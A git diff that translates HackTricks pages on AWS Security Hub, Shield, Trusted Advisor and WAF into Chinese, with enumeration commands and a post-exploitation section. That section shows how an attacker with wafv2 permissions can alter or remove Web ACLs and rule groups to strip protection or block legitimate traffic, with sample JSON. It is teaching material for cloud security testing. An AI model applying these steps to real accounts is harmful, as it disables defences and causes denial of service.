从攻击者的角度来看,这项服务并不是为了检测攻击者,而是为了检测存储文件中的敏感信息。因此,这项服务可能**帮助攻击者在存储桶中找到敏感信息**。\ +> 然而,攻击者也可能对破坏它感兴趣,以防止受害者收到警报,从而更容易窃取该信息。 TODO: PRs are welcome! -## References +## 参考文献 - [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md index 36dc8fbe9..766983494 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md @@ -4,24 +4,21 @@ ## Security Hub -**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. +**Security Hub** 收集来自 **AWS 账户**、服务和支持的第三方合作伙伴产品的安全 **数据**,并帮助您 **分析您的安全** 趋势并识别最高优先级的安全问题。 -It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts +它 **集中管理跨账户的安全相关警报**,并提供一个用户界面来查看这些警报。最大的限制是它 **不集中管理跨区域的警报**,仅限于跨账户。 -**Characteristics** - -- Regional (findings don't cross regions) -- Multi-account support -- Findings from: - - Guard Duty - - Config - - Inspector - - Macie - - third party - - self-generated against CIS standards - -## Enumeration +**特点** +- 区域性(发现不跨区域) +- 多账户支持 +- 来自以下的发现: +- Guard Duty +- Config +- Inspector +- Macie +- 第三方 +- 根据 CIS 标准自生成的 ``` # Get basic info aws securityhub describe-hub @@ -50,18 +47,13 @@ aws securityhub list-automation-rules aws securityhub list-members aws securityhub get-members --account-ids ``` - -## Bypass Detection +## 绕过检测 TODO, PRs accepted -## References +## 参考文献 - [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) - [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md index b1df3003b..da5f612ed 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md @@ -4,16 +4,12 @@ ## Shield -AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. +AWS Shield 旨在帮助 **保护您的基础设施免受分布式拒绝服务攻击**,通常称为 DDoS。 -**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. +**AWS Shield Standard** 对所有人 **免费**,并提供 **DDoS 保护**,针对一些更常见的第三层,**网络层**,和第四层,**传输层**,DDoS 攻击。此保护与 CloudFront 和 Route 53 集成。 -**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. +**AWS Shield Advanced** 提供更 **高水平的保护**,针对更广泛的 AWS 服务的 DDoS 攻击,需额外付费。此高级级别提供对运行在 EC2、CloudFront、ELB 和 Route 53 上的 Web 应用程序的保护。除了这些额外的资源类型受到保护外,与 Standard 相比,还提供增强级别的 DDoS 保护。您还将 **获得 AWS 的 24 小时专门 DDoS 响应团队,称为 DRT**。 -Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** +而 Standard 版本的 Shield 提供对第三层和第四层的保护,**Advanced 还提供对第七层,应用程序攻击的保护。** {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md index a975d7476..f817ddeba 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md @@ -4,72 +4,68 @@ {{#include ../../../../banners/hacktricks-training.md}} -## AWS Trusted Advisor Overview +## AWS Trusted Advisor 概述 -Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: +Trusted Advisor 是一项 **提供建议** 的服务,旨在优化您的 AWS 账户,符合 **AWS 最佳实践**。这是一项跨多个区域运行的服务。Trusted Advisor 在四个主要类别中提供见解: -1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. -2. **Performance:** Identifies potential performance bottlenecks. -3. **Security:** Scans for vulnerabilities or weak security configurations. -4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. +1. **成本优化:** 建议如何重组资源以减少开支。 +2. **性能:** 识别潜在的性能瓶颈。 +3. **安全:** 扫描漏洞或弱安全配置。 +4. **容错:** 推荐增强服务弹性和容错的实践。 -The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. +Trusted Advisor 的全面功能仅在 **AWS 商业或企业支持计划** 下可用。没有这些计划,访问限制为 **六项核心检查**,主要集中在性能和安全上。 -### Notifications and Data Refresh +### 通知和数据刷新 -- Trusted Advisor can issue alerts. -- Items can be excluded from its checks. -- Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. +- Trusted Advisor 可以发出警报。 +- 项目可以从其检查中排除。 +- 数据每 24 小时刷新一次。然而,在上次刷新后 5 分钟可以手动刷新。 -### **Checks Breakdown** +### **检查细分** -#### CategoriesCore +#### 类别核心 -1. Cost Optimization -2. Security -3. Fault Tolerance -4. Performance -5. Service Limits -6. S3 Bucket Permissions +1. 成本优化 +2. 安全 +3. 容错 +4. 性能 +5. 服务限制 +6. S3 存储桶权限 -#### Core Checks +#### 核心检查 -Limited to users without business or enterprise support plans: +限于没有商业或企业支持计划的用户: -1. Security Groups - Specific Ports Unrestricted -2. IAM Use -3. MFA on Root Account -4. EBS Public Snapshots -5. RDS Public Snapshots -6. Service Limits +1. 安全组 - 特定端口不受限制 +2. IAM 使用 +3. 根账户上的 MFA +4. EBS 公共快照 +5. RDS 公共快照 +6. 服务限制 -#### Security Checks +#### 安全检查 -A list of checks primarily focusing on identifying and rectifying security threats: +主要集中在识别和纠正安全威胁的检查列表: -- Security group settings for high-risk ports -- Security group unrestricted access -- Open write/list access to S3 buckets -- MFA enabled on root account -- RDS security group permissiveness -- CloudTrail usage -- SPF records for Route 53 MX records -- HTTPS configuration on ELBs -- Security groups for ELBs -- Certificate checks for CloudFront -- IAM access key rotation (90 days) -- Exposure of access keys (e.g., on GitHub) -- Public visibility of EBS or RDS snapshots -- Weak or absent IAM password policies +- 高风险端口的安全组设置 +- 安全组不受限制的访问 +- 对 S3 存储桶的开放写/列访问 +- 根账户上启用 MFA +- RDS 安全组的宽松性 +- CloudTrail 使用 +- Route 53 MX 记录的 SPF 记录 +- ELB 上的 HTTPS 配置 +- ELB 的安全组 +- CloudFront 的证书检查 +- IAM 访问密钥轮换(90 天) +- 访问密钥的暴露(例如,在 GitHub 上) +- EBS 或 RDS 快照的公共可见性 +- 弱或缺失的 IAM 密码策略 -AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. +AWS Trusted Advisor 作为确保 AWS 服务的优化、性能、安全和容错的重要工具,基于既定的最佳实践。 -## **References** +## **参考文献** - [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md index 661b836d5..095dea8a1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md @@ -6,103 +6,102 @@ ## AWS WAF -AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules. +AWS WAF 是一个 **Web 应用防火墙**,旨在 **保护 Web 应用程序或 API** 免受各种可能影响其可用性、安全性或资源消耗的 Web 攻击。它使用户能够通过设置 **安全规则** 来控制传入流量,从而减轻 SQL 注入或跨站脚本等典型攻击向量的影响,并通过定义自定义过滤规则。 -### Key concepts +### 关键概念 -#### Web ACL (Access Control List) +#### Web ACL(访问控制列表) -A Web ACL is a collection of rules that you can apply to your web applications or APIs. When you associate a Web ACL with a resource, AWS WAF inspects incoming requests based on the rules defined in the Web ACL and takes the specified actions. +Web ACL 是一组规则的集合,您可以将其应用于您的 Web 应用程序或 API。当您将 Web ACL 与资源关联时,AWS WAF 根据 Web ACL 中定义的规则检查传入请求并采取指定的操作。 -#### Rule Group +#### 规则组 -A Rule Group is a reusable collection of rules that you can apply to multiple Web ACLs. Rule groups help manage and maintain consistent rule sets across different web applications or APIs. +规则组是可重用的规则集合,您可以将其应用于多个 Web ACL。规则组有助于在不同的 Web 应用程序或 API 之间管理和维护一致的规则集。 -Each rule group has its associated **capacity**, which helps to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. Once its value is set during creation, it is not possible to modify it. +每个规则组都有其相关的 **容量**,这有助于计算和控制用于运行您的规则、规则组和 Web ACL 的操作资源。一旦在创建时设置了其值,就无法修改。 -#### Rule +#### 规则 -A rule defines a set of conditions that AWS WAF uses to inspect incoming web requests. There are two main types of rules: +规则定义了一组 AWS WAF 用于检查传入 Web 请求的条件。主要有两种类型的规则: -1. **Regular Rule**: This rule type uses specified conditions to determine whether to allow, block, or count web requests. -2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**. +1. **常规规则**:此规则类型使用指定的条件来确定是否允许、阻止或计数 Web 请求。 +2. **基于速率的规则**:在五分钟内计算来自特定 IP 地址的请求。在这里,用户定义一个阈值,如果来自某个 IP 的请求数量在五分钟内超过此限制,则该 IP 的后续请求将被阻止,直到请求速率降至阈值以下。基于速率的规则的最小阈值为 **2000 个请求**。 -#### Managed Rules +#### 管理规则 -AWS WAF offers pre-configured, managed rule sets that are maintained by AWS and AWS Marketplace sellers. These rule sets provide protection against common threats and are regularly updated to address new vulnerabilities. +AWS WAF 提供由 AWS 和 AWS Marketplace 卖家维护的预配置管理规则集。这些规则集提供对常见威胁的保护,并定期更新以应对新漏洞。 -#### IP Set +#### IP 集 -An IP Set is a list of IP addresses or IP address ranges that you want to allow or block. IP sets simplify the process of managing IP-based rules. +IP 集是您希望允许或阻止的 IP 地址或 IP 地址范围的列表。IP 集简化了管理基于 IP 的规则的过程。 -#### Regex Pattern Set +#### 正则表达式模式集 -A Regex Pattern Set contains one or more regular expressions (regex) that define patterns to search for in web requests. This is useful for more complex matching scenarios, such as filtering specific sequences of characters. +正则表达式模式集包含一个或多个正则表达式(regex),用于定义在 Web 请求中搜索的模式。这对于更复杂的匹配场景非常有用,例如过滤特定字符序列。 -#### Lock Token +#### 锁定令牌 -A Lock Token is used for concurrency control when making updates to WAF resources. It ensures that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. +锁定令牌用于在更新 WAF 资源时进行并发控制。它确保更改不会被多个用户或进程同时尝试更新同一资源而意外覆盖。 -#### API Keys +#### API 密钥 -API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations. +AWS WAF 中的 API 密钥用于对某些 API 操作的请求进行身份验证。这些密钥经过加密并安全管理,以控制访问并确保只有授权用户可以更改 WAF 配置。 -- **Example**: Integration of the CAPTCHA API. +- **示例**:CAPTCHA API 的集成。 -#### Permission Policy +#### 权限策略 -A Permission Policy is an IAM policy that specifies who can perform actions on AWS WAF resources. By defining permissions, you can control access to WAF resources and ensure that only authorized users can create, update, or delete configurations. +权限策略是一个 IAM 策略,指定谁可以对 AWS WAF 资源执行操作。通过定义权限,您可以控制对 WAF 资源的访问,并确保只有授权用户可以创建、更新或删除配置。 -#### Scope +#### 范围 -The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution. +AWS WAF 中的范围参数指定 WAF 规则和配置是否适用于区域应用程序或 Amazon CloudFront 分发。 -- **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located. -- **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served. +- **REGIONAL**:适用于区域服务,如应用程序负载均衡器(ALB)、Amazon API Gateway REST API、AWS AppSync GraphQL API、Amazon Cognito 用户池、AWS App Runner 服务和 AWS Verified Access 实例。您指定这些资源所在的 AWS 区域。 +- **CLOUDFRONT**:适用于 Amazon CloudFront 分发,这些分发是全球性的。CloudFront 的 WAF 配置通过 `us-east-1` 区域进行管理,无论内容在哪里提供。 -### Key features +### 关键特性 -#### Monitoring Criteria (Conditions) +#### 监控标准(条件) -**Conditions** specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that **requests restricted at the CloudFront level based on country won't reach WAF**. +**条件** 指定 AWS WAF 监控的传入 HTTP/HTTPS 请求的元素,包括 XSS、地理位置(GEO)、IP 地址、大小限制、SQL 注入和模式(字符串和正则表达式匹配)。需要注意的是,**基于国家在 CloudFront 级别限制的请求不会到达 WAF**。 -Each AWS account can configure: +每个 AWS 账户可以配置: -- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). -- **100 rules** and **50 Web ACLs**. -- A maximum of **5 rate-based rules**. -- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. +- 每种类型 **100 个条件**(正则表达式除外,正则表达式仅允许 **10 个条件**,但此限制可以增加)。 +- **100 条规则** 和 **50 个 Web ACL**。 +- 最多 **5 条基于速率的规则**。 +- 当 WAF 与应用程序负载均衡器一起实施时,吞吐量为 **每秒 10,000 个请求**。 -#### Rule actions +#### 规则操作 -Actions are assigned to each rule, with options being: +每条规则分配操作,选项包括: -- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. -- **Block**: The request is terminated immediately. -- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. -- **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges. +- **允许**:请求被转发到适当的 CloudFront 分发或应用程序负载均衡器。 +- **阻止**:请求立即终止。 +- **计数**:统计符合规则条件的请求。这对于规则测试非常有用,可以在将其设置为允许或阻止之前确认规则的准确性。 +- **CAPTCHA 和挑战**:通过 CAPTCHA 谜题和静默挑战验证请求是否来自机器人。 -If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence: +如果请求与 Web ACL 中的任何规则不匹配,则会执行 **默认操作**(允许或阻止)。规则执行的顺序在 Web ACL 中定义,至关重要,通常遵循以下顺序: -1. Allow Whitelisted IPs. -2. Block Blacklisted IPs. -3. Block requests matching any detrimental signatures. +1. 允许白名单 IP。 +2. 阻止黑名单 IP。 +3. 阻止匹配任何有害签名的请求。 -#### CloudWatch Integration +#### CloudWatch 集成 -AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. These metrics are reported every minute by default and retained for a period of two weeks. +AWS WAF 与 CloudWatch 集成以进行监控,提供如 AllowedRequests、BlockedRequests、CountedRequests 和 PassedRequests 等指标。这些指标默认每分钟报告,并保留两周的时间。 -### Enumeration +### 枚举 -In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia): +为了与 CloudFront 分发进行交互,您必须指定区域 US East(N. Virginia): -- CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` . -- API and SDKs - For all calls, use the Region endpoint us-east-1. +- CLI - 在使用 CloudFront 范围时指定区域 US East:`--scope CLOUDFRONT --region=us-east-1`。 +- API 和 SDK - 对于所有调用,使用区域端点 us-east-1。 -In order to interact with regional services, you should specify the region: - -- Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2` +为了与区域服务进行交互,您应指定区域: +- 以区域欧洲(西班牙)为例:`--scope REGIONAL --region=eu-south-2` ```bash # Web ACLs # @@ -146,7 +145,7 @@ aws wafv2 list-ip-sets --scope | CLOUDFRONT --region= aws wafv2 get-ip-set --name --id --scope | CLOUDFRONT --region=us-east-1> ## Retrieve the keys that are currently being managed by a rate-based rule. aws wafv2 get-rate-based-statement-managed-keys --scope | CLOUDFRONT --region=us-east-1>\ - --web-acl-name --web-acl-id --rule-name [--rule-group-rule-name ] +--web-acl-name --web-acl-id --rule-name [--rule-group-rule-name ] # Regex pattern sets # @@ -186,78 +185,70 @@ aws wafv2 list-mobile-sdk-releases --platform aws wafv2 get-mobile-sdk-release --platform --release-version ``` - ### Post Exploitation / Bypass > [!TIP] -> From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs. +> 从攻击者的角度来看,这项服务可以帮助攻击者识别 WAF 保护和网络暴露,这可能帮助他攻陷其他网站。 > -> However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF. +> 然而,攻击者也可能对破坏这项服务感兴趣,以便网站不受 WAF 保护。 -In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource. +在许多删除和更新操作中,提供 **lock token** 是必要的。此令牌用于对资源进行并发控制,确保更改不会被多个用户或进程同时尝试更新同一资源而意外覆盖。为了获得此令牌,您可以对特定资源执行相应的 **list** 或 **get** 操作。 #### **`wafv2:CreateRuleGroup`, `wafv2:UpdateRuleGroup`, `wafv2:DeleteRuleGroup`** -An attacker would be able to compromise the security of the affected resource by: - -- Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service. -- Updating rule groups, being able to modify its actions for example from **Block** to **Allow**. -- Deleting rule groups that provide critical security measures. +攻击者将能够通过以下方式危害受影响资源的安全性: +- 创建规则组,例如,可以阻止来自合法 IP 地址的合法流量,从而导致服务拒绝。 +- 更新规则组,能够修改其操作,例如从 **Block** 更改为 **Allow**。 +- 删除提供关键安全措施的规则组。 ```bash # Create Rule Group aws wafv2 create-rule-group --name --capacity --visibility-config \ --scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] # Update Rule Group aws wafv2 update-rule-group --name --id --visibility-config --lock-token \ - --scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] +--scope | CLOUDFRONT --region=us-east-1> [--rules ] [--description ] # Delete Rule Group aws wafv2 delete-rule-group --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` - -The following examples shows a rule group that would block legitimate traffic from specific IP addresses: - +以下示例显示了一个规则组,该规则组将阻止来自特定IP地址的合法流量: ```bash aws wafv2 create-rule-group --name BlockLegitimateIPsRuleGroup --capacity 1 --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=BlockLegitimateIPsRuleGroup --scope CLOUDFRONT --region us-east-1 --rules file://rule.json ``` - -The **rule.json** file would look like: - +该 **rule.json** 文件看起来像: ```json [ - { - "Name": "BlockLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Block": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "BlockLegitimateIPsRule" - } - } +{ +"Name": "BlockLegitimateIPsRule", +"Priority": 0, +"Statement": { +"IPSetReferenceStatement": { +"ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +}, +"Action": { +"Block": {} +}, +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "BlockLegitimateIPsRule" +} +} ] ``` - -**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks. +**潜在影响**:未经授权的访问、数据泄露和潜在的拒绝服务攻击。 #### **`wafv2:CreateWebACL`, `wafv2:UpdateWebACL`, `wafv2:DeleteWebACL`** -With these permissions, an attacker would be able to: +拥有这些权限,攻击者将能够: -- Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service. -- Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests. -- Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks. +- 创建一个新的 Web ACL,引入允许恶意流量通过或阻止合法流量的规则,从而使 WAF 无效或导致拒绝服务。 +- 更新现有的 Web ACL,能够修改规则以允许之前被阻止的攻击,例如 SQL 注入或跨站脚本,或通过阻止有效请求来干扰正常流量。 +- 删除一个 Web ACL,使受影响的资源完全不受保护,暴露于广泛的网络攻击中。 > [!NOTE] -> You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false. - +> 只有当 **ManagedByFirewallManager** 为 false 时,您才能删除指定的 **WebACL**。 ```bash # Create Web ACL aws wafv2 create-web-acl --name --default-action --visibility-config \ @@ -268,119 +259,109 @@ aws wafv2 update-web-acl --name --id --default-action -- # Delete Web ACL aws wafv2 delete-web-acl --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` +以下示例显示如何更新 Web ACL 以阻止来自特定 IP 集的合法流量。如果源 IP 不匹配这些 IP 中的任何一个,默认操作也将阻止它,从而导致 DoS。 -The following examples shows how to update a Web ACL to block the legitimate traffic from a specific IP set. If the origin IP does not match any of those IPs, the default action would also be blocking it, causing a DoS. - -**Original Web ACL**: - +**原始 Web ACL**: ```json { - "WebACL": { - "Name": "AllowLegitimateIPsWebACL", - "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "DefaultAction": { - "Allow": {} - }, - "Description": "", - "Rules": [ - { - "Name": "AllowLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Allow": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsRule" - } - } - ], - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsWebACL" - }, - "Capacity": 1, - "ManagedByFirewallManager": false, - "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" - }, - "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +"WebACL": { +"Name": "AllowLegitimateIPsWebACL", +"Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", +"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", +"DefaultAction": { +"Allow": {} +}, +"Description": "", +"Rules": [ +{ +"Name": "AllowLegitimateIPsRule", +"Priority": 0, +"Statement": { +"IPSetReferenceStatement": { +"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +}, +"Action": { +"Allow": {} +}, +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "AllowLegitimateIPsRule" +} +} +], +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "AllowLegitimateIPsWebACL" +}, +"Capacity": 1, +"ManagedByFirewallManager": false, +"LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" +}, +"LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } ``` - -Command to update the Web ACL: - +更新 Web ACL 的命令: ```json aws wafv2 update-web-acl --name AllowLegitimateIPsWebACL --scope REGIONAL --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --default-action Block={} --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=AllowLegitimateIPsWebACL --rules file://rule.json --region us-east-1 ``` - -The **rule.json** file would look like: - +该 **rule.json** 文件看起来像: ```json [ - { - "Name": "BlockLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Block": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "BlockLegitimateIPRule" - } - } +{ +"Name": "BlockLegitimateIPsRule", +"Priority": 0, +"Statement": { +"IPSetReferenceStatement": { +"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +}, +"Action": { +"Block": {} +}, +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "BlockLegitimateIPRule" +} +} ] ``` - -**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks. +**潜在影响**:未经授权的访问、数据泄露和潜在的拒绝服务攻击。 #### **`wafv2:AssociateWebACL`, `wafv2:DisassociateWebACL`** -The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate web ACLs (Access Control Lists) with resources, being able to bypass security controls, allowing unauthorized traffic to reach the application, potentially leading to exploits like SQL injection or cross-site scripting (XSS). Conversely, with the **`wafv2:DisassociateWebACL`** permission, the attacker could temporarily disable security protections, exposing the resources to vulnerabilities without detection. +**`wafv2:AssociateWebACL`** 权限将允许攻击者将 web ACL(访问控制列表)与资源关联,从而能够绕过安全控制,允许未经授权的流量到达应用程序,可能导致 SQL 注入或跨站脚本(XSS)等漏洞。相反,使用 **`wafv2:DisassociateWebACL`** 权限,攻击者可以暂时禁用安全保护,使资源暴露于未被检测的漏洞中。 -The additional permissions would be needed depending on the protected resource type: - -- **Associate** - - apigateway:SetWebACL - - apprunner:AssociateWebAcl - - appsync:SetWebACL - - cognito-idp:AssociateWebACL - - ec2:AssociateVerifiedAccessInstanceWebAcl - - elasticloadbalancing:SetWebAcl -- **Disassociate** - - apigateway:SetWebACL - - apprunner:DisassociateWebAcl - - appsync:SetWebACL - - cognito-idp:DisassociateWebACL - - ec2:DisassociateVerifiedAccessInstanceWebAcl - - elasticloadbalancing:SetWebAcl +根据受保护资源类型,可能需要额外的权限: +- **关联** +- apigateway:SetWebACL +- apprunner:AssociateWebAcl +- appsync:SetWebACL +- cognito-idp:AssociateWebACL +- ec2:AssociateVerifiedAccessInstanceWebAcl +- elasticloadbalancing:SetWebAcl +- **解除关联** +- apigateway:SetWebACL +- apprunner:DisassociateWebAcl +- appsync:SetWebACL +- cognito-idp:DisassociateWebACL +- ec2:DisassociateVerifiedAccessInstanceWebAcl +- elasticloadbalancing:SetWebAcl ```bash # Associate aws wafv2 associate-web-acl --web-acl-arn --resource-arn # Disassociate aws wafv2 disassociate-web-acl --resource-arn ``` - -**Potential Impact**: Compromised resources security, increased risk of exploitation, and potential service disruptions within AWS environments protected by AWS WAF. +**潜在影响**:资源安全受到威胁,利用风险增加,以及在受 AWS WAF 保护的 AWS 环境中可能出现服务中断。 #### **`wafv2:CreateIPSet` , `wafv2:UpdateIPSet`, `wafv2:DeleteIPSet`** -An attacker would be able to create, update and delete the IP sets managed by AWS WAF. This could be dangerous since could create new IP sets 